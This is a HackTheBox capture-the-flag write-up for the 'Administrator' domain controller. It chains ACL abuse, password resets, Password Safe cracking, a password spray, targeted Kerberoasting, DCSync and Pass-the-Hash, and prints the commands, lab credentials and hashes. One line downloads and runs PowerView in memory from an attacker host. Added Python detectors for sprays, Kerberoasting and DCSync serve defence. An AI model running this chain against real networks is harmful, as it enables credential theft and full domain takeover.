
HackTheBox: Administrator

2026-06-08 10 min read
Tracks CPTS

Introduction

Administrator is a Windows Domain Controller that chains six distinct misconfigurations together into a full domain compromise. Credentials for a low-privileged user (Olivia) are provided as a starting point. Each step in the chain hands off cleanly to the next - this is an excellent box for understanding how real-world Active Directory attack paths are built using ACL abuse. The path to root:

  1. Enumeration → Nmap reveals a DC with FTP, Kerberos, LDAP, SMB, and WinRM open
  2. BloodHound → using provided creds for Olivia, map the domain and find ACL misconfigurations
  3. GenericAll abuse → Olivia has full control over Michael → force-reset his password
  4. ForceChangePassword → Michael can force-change Benjamin’s password → FTP access
  5. FTP + Password Safe crack → download Backup.psafe3, crack it, get credentials for multiple users
  6. Password spray → only Emily’s credentials are valid → WinRM shell + user flag
  7. Targeted Kerberoasting → Emily has GenericWrite over Ethan → set a fake SPN → roast the hash → crack it
  8. DCSync → Ethan has DCSync rights → dump Administrator hash → Pass-the-Hash → root flag

Key Concepts

What is BloodHound? BloodHound is a tool that collects Active Directory data (users, groups, permissions, ACLs) and maps it as a graph. It makes attack paths that would take hours to enumerate manually visible in seconds. bloodhound-python (also called BloodHound.py) is the Python ingestor that does the data collection from your attacker machine.

What is an ACL (Access Control List)? Every AD object (user, group, computer) has an ACL - a list of who can do what to it. Misconfigurations in these lists create the entire attack chain in this box. The dangerous rights to look for are GenericAll, GenericWrite, and ForceChangePassword.

What is GenericAll? The most powerful ACL right - it grants full control over the target object. If you have GenericAll over a user, you can reset their password, modify their attributes, add them to groups, or perform a targeted Kerberoast attack against them.

What is ForceChangePassword? An AD right that lets you reset another user’s password without knowing their current one. It bypasses the normal “confirm old password” check entirely.

What is GenericWrite? A slightly weaker right than GenericAll - it lets you modify certain attributes of the target object. The most dangerous attribute to write to is servicePrincipalName (SPN), because setting a fake SPN on an account turns it into a Kerberoastable target.

What is Kerberoasting? When an account has a Service Principal Name (SPN), the Domain Controller will hand out a service ticket encrypted with that account’s password hash to any authenticated domain user. That ticket can be captured offline and cracked. Targeted Kerberoasting means you first abuse GenericWrite to add a fake SPN to a target account, making it Kerberoastable on demand.

What is a Password Safe .psafe3 file? Password Safe is a password manager application. It stores credentials in an encrypted .psafe3 database protected by a master password. If that master password is weak, hashcat (mode 5200) can crack it with a wordlist.

What is a password spray? Instead of trying many passwords against one account (which triggers lockout), a spray tries one password across many accounts. Here we spray all the credentials recovered from the Password Safe database across domain accounts.

What is DCSync? A technique that abuses the MS-DRSR replication protocol used by Domain Controllers to sync with each other. Any account with the DS-Replication-Get-Changes-All right (typically only DCs and Domain Admins) can request a copy of any user’s password hash directly from the DC - without touching the disk or running code on the DC.

What is Pass-the-Hash? Windows NTLM authentication accepts a password hash directly instead of the plaintext password. If you have a user’s NT hash from a DCSync, you can authenticate as that user with tools like evil-winrm -H without ever knowing the password in plaintext.
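The Key Concepts above describe how BloodHound turns ACL entries into a graph and walks it. The following Python script is an added example (not code from the writeup or from the BloodHound project) that does the same thing on a constructed set of ACEs shaped like BloodHound's (source, right, target) edges, from the auditing side: it keeps only the control-granting rights named above, finds the shortest chain from a principal to the domain object, and lists every principal that has some chain ending in DCSync, which is exactly the set of ACEs a defender needs to remove. The sample edges reproduce the ones this writeup finds; the extra ReadProperty edge is constructed to show that benign rights are ignored.

```python
from collections import deque

# Outbound rights the writeup treats as exploitable control over the target object.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword", "DCSync"}

# Constructed sample ACEs in the shape of BloodHound's (source, right, target) edges.
# They reproduce the edges the writeup reports; they are not real collector output.
SAMPLE_ACES = [
    ("OLIVIA@ADMINISTRATOR.HTB", "GenericAll", "MICHAEL@ADMINISTRATOR.HTB"),
    ("MICHAEL@ADMINISTRATOR.HTB", "ForceChangePassword", "BENJAMIN@ADMINISTRATOR.HTB"),
    ("EMILY@ADMINISTRATOR.HTB", "GenericWrite", "ETHAN@ADMINISTRATOR.HTB"),
    ("ETHAN@ADMINISTRATOR.HTB", "DCSync", "ADMINISTRATOR.HTB"),
    # A read-only right (constructed): must not appear in the graph.
    ("OLIVIA@ADMINISTRATOR.HTB", "ReadProperty", "ETHAN@ADMINISTRATOR.HTB"),
]


def build_graph(aces):
    """Adjacency list keeping only edges whose right grants control over the target."""
    graph = {}
    for src, right, dst in aces:
        if right in DANGEROUS_RIGHTS:
            graph.setdefault(src, []).append((right, dst))
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns the edge list of one shortest path, or None."""
    queue = deque([start])
    parent = {start: None}  # node -> (previous node, right used to reach it)
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while parent[node] is not None:
                prev, right = parent[node]
                path.append((prev, right, node))
                node = prev
            return list(reversed(path))
        for right, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, right)
                queue.append(nxt)
    return None


def principals_reaching(graph, goal):
    """Every principal with some chain of dangerous rights ending at goal (the audit view)."""
    return sorted(p for p in graph if p != goal and shortest_path(graph, p, goal) is not None)


def describe(path):
    """Render a path in the arrow style BloodHound uses for edges."""
    if not path:
        return "(no path)"
    out = path[0][0]
    for _, right, dst in path:
        out += f" --[{right}]--> {dst}"
    return out


if __name__ == "__main__":
    g = build_graph(SAMPLE_ACES)
    domain = "ADMINISTRATOR.HTB"
    for user in ("OLIVIA@ADMINISTRATOR.HTB", "EMILY@ADMINISTRATOR.HTB"):
        print(user, "->", describe(shortest_path(g, user, domain)))
    print("principals with a chain to DCSync:", principals_reaching(g, domain))
```

Olivia's chain stops at Benjamin because the Benjamin-to-Emily hop on this box is a file on an FTP share, not an ACE, which is why an ACL audit alone would miss it; Emily's chain reaches the domain head in two edges, and removing either the GenericWrite or the DCSync ACE breaks it.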


Enumeration

Nmap

ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -sC -sV <TARGET>

Key open ports:

Port | Service | Notes
21 | FTP | Worth trying - Benjamin’s group has access here later
88 | Kerberos | Confirms this is a Domain Controller
389 / 3268 | LDAP | Domain: administrator.htb
445 | SMB | Message signing enabled and required
5985 | WinRM | Remote management - shell access if we get valid creds

Add the domain to your hosts file:

echo "<TARGET> administrator.htb" | sudo tee -a /etc/hosts

BloodHound Enumeration

We’re given starting credentials: Olivia:ichliebedich. Use bloodhound-python to collect all domain data and pipe it into BloodHound for analysis.

python3 ~/tools/BloodHound.py/bloodhound.py -d administrator.htb -c All \
  -u olivia -p 'ichliebedich' -ns <TARGET> -k

This produces JSON files locally. Start the neo4j service and upload them to BloodHound:

sudo neo4j console
# neo4j's own browser is at http://localhost:7474; start the BloodHound GUI and upload the JSON files there

Why does Kerberos fall back to NTLM? The tool tries Kerberos first, but since dc.administrator.htb isn’t in our hosts file with the correct hostname, it falls back to NTLM automatically. That’s fine - the data collection still works.

In BloodHound, set OLIVIA@ADMINISTRATOR.HTB as the starting node. Go to Node Info → Outbound Object Control → First Degree Object Control. You’ll see:

Olivia ──[ GenericAll ]──► Michael

Foothold: GenericAll: Olivia → Michael

What this lets us do

GenericAll = full control. The easiest abuse is a forced password reset - we set a new password for Michael without needing to know his current one.

Connect as Olivia and reset Michael’s password

evil-winrm -i <TARGET> -u olivia -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael nirza123 /domain
The command completed successfully.

What does the /domain flag do? It ensures the password change applies to the domain account (stored on the DC) rather than a local account. Always include this when targeting AD users.

Now check Michael’s outbound control in BloodHound. Go to Node Info → Outbound Object Control → Transitive Object Control for MICHAEL@ADMINISTRATOR.HTB:

Michael ──[ ForceChangePassword ]──► Benjamin

Lateral Movement: ForceChangePassword: Michael → Benjamin → FTP

Connect as Michael

evil-winrm -i <TARGET> -u michael -p 'nirza123'

Load PowerView and reset Benjamin’s password

PowerView is a PowerShell toolkit for AD enumeration and manipulation. We load it in memory via IEX (Invoke-Expression) - this avoids writing it to disk and bypasses some AV.

# Host PowerView.ps1 on your attacker machine first (python3 -m http.server 4000)
*Evil-WinRM* PS C:\Users\michael\Documents> IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:4000/PowerView.ps1')

# Store Michael's password as a secure credential object
*Evil-WinRM* PS C:\Users\michael\Documents> $SecPassword = ConvertTo-SecureString 'nirza123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael\Documents> $Cred = New-Object System.Management.Automation.PSCredential ('ADMINISTRATOR\michael', $SecPassword)

# Set the new password for Benjamin
*Evil-WinRM* PS C:\Users\michael\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael\Documents> Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred

Why use a PSCredential object? Set-DomainUserPassword needs to authenticate to the DC to make the change. We pass Michael’s credentials explicitly so the cmdlet uses them rather than defaulting to the session’s current token.

Access FTP as Benjamin

BloodHound shows Benjamin is a member of the Share Moderators group. Our Nmap scan showed FTP open on port 21 - this group likely has FTP access.

ftp benjamin@<TARGET>
# Password: Password123!

ftp> dir
10-05-24  09:13AM       952 Backup.psafe3

ftp> get Backup.psafe3

Cracking the Password Safe Database

What is Backup.psafe3?

A Password Safe encrypted database. It holds credentials for multiple users, protected by a master password. hashcat mode 5200 handles this format.

hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
Backup.psafe3:tekieromucho
Status: Cracked

Master password: tekieromucho

Open the database

Install Password Safe (sudo apt install passwordsafe) or use a Windows VM. Open Backup.psafe3 with the master password. Right-click each entry and choose Copy Password to Clipboard to retrieve the credentials:

Username | Password
alexander | UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily | UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma | WwANQWnmJnGV07WQN8bMS7FMAbjNur

Password Spray → Emily → User Flag

Spray the recovered credentials across the domain

Save the usernames to user.txt and the passwords to pass.txt, then use netexec to check which combination is valid:

netexec smb <TARGET> -u user.txt -p pass.txt
SMB  <TARGET>  445  DC  [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb  STATUS_LOGON_FAILURE
SMB  <TARGET>  445  DC  [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Why does netexec spray all password/user combinations? With -u and -p pointing to files, netexec tests every user against every password by default (use --no-bruteforce to only test matching pairs). Here we want the cross-product since each user may have any of the three passwords.

Only emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb is valid.
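The spray above is visible on the DC as a burst of failed logons from one source against several accounts, followed by one success. This Python detector is an added example (not the writeup's code, and not netexec's) that runs over a constructed set of logon records in a minimal dict form: event 4625 for a failed logon and 4624 for a success. It groups failures by source address inside a sliding window, alerts when one source fails against at least three distinct accounts, and reports which of those accounts later logged on successfully. The source address 10.10.14.5 and the workstation 10.10.20.7 are placeholders; the nine attempts from the first address mirror the three-user, three-password cross-product the spray performed.

```python
from collections import defaultdict

# Constructed sample of Windows logon events (EventID 4625 = failed logon,
# 4624 = successful logon). Times are epoch seconds; IPs are placeholders.
SAMPLE_EVENTS = [
    {"time": 1000, "event_id": 4625, "user": "alexander", "src_ip": "10.10.14.5"},
    {"time": 1000, "event_id": 4625, "user": "alexander", "src_ip": "10.10.14.5"},
    {"time": 1001, "event_id": 4625, "user": "alexander", "src_ip": "10.10.14.5"},
    {"time": 1001, "event_id": 4625, "user": "emily", "src_ip": "10.10.14.5"},
    {"time": 1002, "event_id": 4624, "user": "emily", "src_ip": "10.10.14.5"},
    {"time": 1002, "event_id": 4625, "user": "emily", "src_ip": "10.10.14.5"},
    {"time": 1003, "event_id": 4625, "user": "emma", "src_ip": "10.10.14.5"},
    {"time": 1003, "event_id": 4625, "user": "emma", "src_ip": "10.10.14.5"},
    {"time": 1004, "event_id": 4625, "user": "emma", "src_ip": "10.10.14.5"},
    # A user mistyping their own password twice from a workstation: not a spray.
    {"time": 1010, "event_id": 4625, "user": "olivia", "src_ip": "10.10.20.7"},
    {"time": 1012, "event_id": 4625, "user": "olivia", "src_ip": "10.10.20.7"},
    {"time": 1015, "event_id": 4624, "user": "olivia", "src_ip": "10.10.20.7"},
]


def detect_spray(events, window=300, min_accounts=3):
    """Group failed logons by source IP inside a sliding window of `window` seconds;
    alert when one source fails against at least `min_accounts` distinct accounts.
    Returns one alert per offending source."""
    failures = defaultdict(list)   # src_ip -> [(time, user)], in time order
    successes = defaultdict(set)   # src_ip -> {users that logged on successfully}
    for e in sorted(events, key=lambda e: e["time"]):
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append((e["time"], e["user"]))
        elif e["event_id"] == 4624:
            successes[e["src_ip"]].add(e["user"])

    alerts = []
    for ip, fails in failures.items():
        # Start a window at each failure; the first window that crosses the
        # threshold produces the alert, so a source is reported once.
        for i, (t0, _) in enumerate(fails):
            in_win = [u for t, u in fails[i:] if t - t0 <= window]
            accounts = set(in_win)
            if len(accounts) >= min_accounts:
                alerts.append({
                    "src_ip": ip,
                    "failed_attempts": len(in_win),
                    "accounts": sorted(accounts),
                    # Accounts the same source later authenticated as: the spray worked.
                    "followed_by_success": sorted(accounts & successes[ip]),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```

The distinct-account count is the discriminator: a single user fat-fingering a password produces many failures for one account, a spray produces few failures for many accounts, which is also why a spray stays under the per-account lockout threshold that the Key Concepts section mentions.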

Get a shell as Emily

evil-winrm -i <TARGET> -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

User flag captured. C:\Users\emily\Desktop\user.txt


Privilege Escalation: Targeted Kerberoasting: Emily → Ethan

Find Emily’s outbound control in BloodHound

In BloodHound, set EMILY@ADMINISTRATOR.HTB as your starting node. Go to Node Info → Outbound Object Control → Transitive Object Control:

Emily ──[ GenericWrite ]──► Ethan

GenericWrite over a user means we can write to their servicePrincipalName attribute. Setting a fake SPN turns the account into a Kerberoasting target - the DC will issue a service ticket encrypted with Ethan’s password hash.

Why is this “targeted”? Normal Kerberoasting only works on accounts that already have SPNs. Targeted Kerberoasting is different - we add a fake SPN to a target account first (exploiting GenericWrite), then immediately roast it. After cracking, it’s good practice to remove the fake SPN.

Fix the clock skew first

Kerberos requires the client clock to be within 5 minutes of the DC’s clock. The box’s clock is significantly ahead - sync before running the attack:

sudo ntpdate <TARGET>
CLOCK: time stepped by 25274.951714

Run targetedKerberoast

python3 targetedKerberoast.py \
  --dc-ip <TARGET> \
  -d administrator.htb \
  -u emily \
  -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' \
  -U ethan.txt

This adds a temporary SPN to Ethan’s account, requests the service ticket (which comes back encrypted with Ethan’s hash), and saves it for cracking.

Crack the hash

hashcat -a 0 -m 13100 ethan /usr/share/wordlists/rockyou.txt

Ethan’s password: limpbizkit
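The three moves targetedKerberoast makes against Ethan (write an SPN on a user object, request a service ticket for that account, remove the SPN) leave a recognisable trail in the DC's security log. This Python example is added here and is not the writeup's code or the targetedKerberoast project's; it runs over constructed records shaped like two event types: 5136 (directory object modified, which requires Directory Service Changes auditing with a SACL on the user objects, an assumption of this example) and 4769 (Kerberos service ticket requested). It flags the plain Kerberoast indicator, an RC4 (etype 0x17) ticket for a user account, and separately correlates an SPN write on a user object with a ticket request for that same account inside a short window, which is the targeted variant.

```python
# Constructed sample records in a minimal dict form, not real event log output.
#   5136: an attribute written on a directory object (needs DS Changes auditing)
#   4769: a Kerberos service ticket requested; etype is the ticket encryption type
# Times are epoch seconds.
SAMPLE_DIR_CHANGES = [
    {"time": 100, "event_id": 5136, "subject": "emily", "object": "ethan",
     "object_class": "user", "attribute": "servicePrincipalName", "op": "add"},
    {"time": 106, "event_id": 5136, "subject": "emily", "object": "ethan",
     "object_class": "user", "attribute": "servicePrincipalName", "op": "delete"},
    # Routine: a computer object registering its own SPN. Not a user account.
    {"time": 200, "event_id": 5136, "subject": "DC$", "object": "DC$",
     "object_class": "computer", "attribute": "servicePrincipalName", "op": "add"},
]

SAMPLE_TGS_REQUESTS = [
    {"time": 103, "event_id": 4769, "requester": "emily", "service": "ethan", "etype": 0x17},
    {"time": 150, "event_id": 4769, "requester": "olivia", "service": "DC$", "etype": 0x12},
    {"time": 160, "event_id": 4769, "requester": "olivia", "service": "krbtgt", "etype": 0x12},
]

RC4_HMAC = 0x17   # tickets in this etype are the cheapest to crack offline


def rc4_tickets_for_user_services(tgs_requests):
    """4769 events for a user (non-'$') service account with RC4 encryption: the plain
    Kerberoast indicator. krbtgt is excluded because every TGT renewal names it."""
    hits = []
    for e in tgs_requests:
        svc = e["service"]
        if e["etype"] == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
            hits.append((e["requester"], svc))
    return hits


def correlate_targeted_kerberoast(dir_changes, tgs_requests, window=300):
    """Targeted Kerberoast signature: servicePrincipalName written on a *user* object and a
    service ticket requested for that same account within `window` seconds. Also records
    whether the SPN was removed again afterwards (the clean-up step the writeup describes).
    Returns one finding per SPN write that was followed by a ticket request."""
    spn_adds = [c for c in dir_changes
                if c["event_id"] == 5136 and c["attribute"] == "servicePrincipalName"
                and c["object_class"] == "user" and c["op"] == "add"]
    findings = []
    for add in spn_adds:
        tickets = [t for t in tgs_requests
                   if t["service"].lower() == add["object"].lower()
                   and 0 <= t["time"] - add["time"] <= window]
        if not tickets:
            continue
        removed = any(c["op"] == "delete" and c["object"] == add["object"]
                      and c["attribute"] == "servicePrincipalName"
                      and c["time"] > add["time"] for c in dir_changes)
        findings.append({
            "target": add["object"],
            "spn_written_by": add["subject"],
            "ticket_requested_by": sorted({t["requester"] for t in tickets}),
            "spn_removed_after": removed,
        })
    return findings


if __name__ == "__main__":
    print("RC4 tickets for user accounts:", rc4_tickets_for_user_services(SAMPLE_TGS_REQUESTS))
    for f in correlate_targeted_kerberoast(SAMPLE_DIR_CHANGES, SAMPLE_TGS_REQUESTS):
        print("targeted Kerberoast:", f)
```

The correlation matters because Ethan had no SPN before the attack, so an SPN inventory taken earlier would not have listed him as roastable; the write-then-request pattern is what exposes the GenericWrite abuse, and the subject of the 5136 event (Emily) is the account whose ACE needs fixing.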


DCSync → Pass-the-Hash → Administrator

Check Ethan’s path in BloodHound

In BloodHound, go to Analysis → Find Shortest Paths to Domain Admins. Ethan appears with a DCSync edge to the domain. He has the DS-Replication-Get-Changes-All right, which is all secretsdump needs.

Run secretsdump as Ethan

secretsdump.py -just-dc ADMINISTRATOR.HTB/ethan@<TARGET>
# Password: limpbizkit
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
olivia:1108:...:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
michael:1109:...:41320fdff1d6c9b55c939c77a472a8a4:::
benjamin:1110:...:2b576acbe6bcfda7294d6bd18041b8fe:::
emily:1112:...:eb200a2583a88ace2983ee5caa520f31:::
ethan:1113:...:5c2b9f97e0620c3d307de85a93179884:::

What is -just-dc? This flag tells secretsdump to only dump domain controller secrets (the NTDS.DIT data) via DRSUAPI replication, rather than also trying to dump local SAM/LSA secrets. It’s quieter and faster.
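A DCSync request is recorded on the DC as event 4662 (an operation was performed on an object) naming the replication control-access rights in its Properties field. This Python detector is an added example, not the writeup's code or part of impacket; it runs over constructed 4662-shaped records and flags any subject that exercises DS-Replication-Get-Changes or DS-Replication-Get-Changes-All on the domain head unless it is a computer account (trailing $, the DCs replicating with each other) or on an explicit allow list for legitimate replication identities such as a directory-sync service account. The replication GUIDs are the well-known schema values; the User-Force-Change-Password GUID in the benign record is likewise the schema value, included to show that ordinary control-access events are ignored.

```python
# Well-known control-access right GUIDs for directory replication (AD schema values).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 access mask

# Constructed sample 4662 records. A real event lists the requested property GUIDs in
# its Properties field; here they are a plain list. Subjects are the page's accounts.
SAMPLE_4662 = [
    # A domain controller replicating normally: expected, not reported.
    {"subject": "DC$", "object_type": "domainDNS", "access_mask": 0x100,
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    # A user account requesting replication rights: the DCSync signature.
    {"subject": "ethan", "object_type": "domainDNS", "access_mask": 0x100,
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    # Ordinary control-access on a user object (User-Force-Change-Password): unrelated.
    {"subject": "olivia", "object_type": "user", "access_mask": 0x100,
     "properties": ["00299570-246d-11d0-a768-00aa006e0529"]},
]


def detect_dcsync(events, allowed_replicators=()):
    """Return one finding per 4662 event in which a non-DC, non-allow-listed subject
    exercised a replication control-access right."""
    allowed = {a.lower() for a in allowed_replicators}
    findings = []
    for e in events:
        if not (e["access_mask"] & CONTROL_ACCESS):
            continue
        rights = [REPLICATION_GUIDS[g] for g in e["properties"] if g in REPLICATION_GUIDS]
        if not rights:
            continue
        subject = e["subject"]
        if subject.endswith("$") or subject.lower() in allowed:
            continue
        findings.append({"subject": subject, "rights": rights})
    return findings


if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_4662):
        print("replication rights used by a non-DC principal:", finding)
```

The allow list is what keeps the rule quiet in a real environment: any product that legitimately replicates (a password-filter or cloud-sync connector) holds these same rights, so the expected set is small and should be enumerated, and anything outside it reading Get-Changes-All from the domain head deserves an immediate look.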

Pass-the-Hash as Administrator

evil-winrm -i <TARGET> -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Root flag captured. C:\Users\Administrator\Desktop\root.txt


Summary

nmap → DC at <TARGET> (FTP, Kerberos, LDAP, SMB, WinRM)

Given credentials: Olivia:ichliebedich

bloodhound-python → BloodHound graph
→ Olivia ──[GenericAll]──► Michael

evil-winrm as Olivia → net user michael nirza123 /domain

evil-winrm as Michael → PowerView → Set-DomainUserPassword benjamin → Password123!
→ Michael ──[ForceChangePassword]──► Benjamin

ftp benjamin@<TARGET> → Backup.psafe3

hashcat -m 5200 → master password: tekieromucho
Password Safe → alexander / emily / emma credentials

netexec smb spray → only emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb valid

evil-winrm as Emily → USER FLAG

BloodHound → Emily ──[GenericWrite]──► Ethan

sudo ntpdate (fix clock skew)
targetedKerberoast.py → Ethan's TGS hash
hashcat -m 13100 → ethan:limpbizkit

BloodHound → Ethan ──[DCSync]──► Domain
secretsdump.py -just-dc → Administrator NT hash: 3dc553ce4b9fd20bd016e098d2d2fd2e

evil-winrm -H → Administrator → ROOT FLAG

Tools Used

Tool | What it does | How to get it
nmap | Port scanning and service fingerprinting | sudo apt install nmap
bloodhound-python | Collects AD data for BloodHound graph analysis | pip install bloodhound
BloodHound + neo4j | Visualises AD attack paths as a graph | github.com/BloodHoundAD/BloodHound
evil-winrm | WinRM remote shell; supports Pass-the-Hash with -H | gem install evil-winrm
PowerView | PowerShell AD manipulation toolkit | github.com/PowerShellMafia/PowerSploit
hashcat | GPU-accelerated password cracker (modes: 5200 for psafe3, 13100 for TGS) | sudo apt install hashcat
netexec (nxc) | Swiss-army AD tool - SMB spray, WinRM, MSSQL | pip install netexec
targetedKerberoast.py | Abuses GenericWrite to add fake SPNs and roast target accounts | github.com/ShutdownRepo/targetedKerberoast
impacket-secretsdump | DCSync - dumps domain hashes via DRSUAPI replication | Part of impacket (pip install impacket)
ntpdate | Syncs system clock with a remote NTP/AD server | sudo apt install ntpdate
Password Safe | Opens and reads .psafe3 credential databases | sudo apt install passwordsafe